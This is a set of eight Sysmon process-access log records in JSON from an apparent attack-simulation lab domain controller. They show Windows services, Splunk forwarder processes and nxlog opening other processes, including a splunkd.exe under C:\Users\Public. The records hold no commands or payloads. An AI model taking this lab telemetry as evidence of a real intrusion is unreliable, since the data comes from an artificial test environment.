{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.006\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-0010D7720900}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.006","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-0010D7720900}","TargetProcessId":"2896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.131\r\nSourceProcessGUID: {E2A3D6B1-12B3-5F25-0000-0010D7720900}\r\nSourceProcessId: 2896\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.131","SourceProcessGUID":"{E2A3D6B1-12B3-5F25-0000-0010D7720900}","SourceProcessId":"2896","SourceThreadId":"2756","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.725\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2900\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.725","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2900","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.725\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2900\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.725","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2900","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+57817|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+8a475|C:\\Windows\\system32\\wbem\\wbemcore.dll+bcb3|C:\\Windows\\system32\\wbem\\wbemcore.dll+3393|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2c9be|C:\\Windows\\system32\\wbem\\wbemcore.dll+202d8|C:\\Windows\\system32\\wbem\\wbemcore.dll+390e|C:\\Windows\\system32\\wbem\\wbemcore.dll+22bba|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
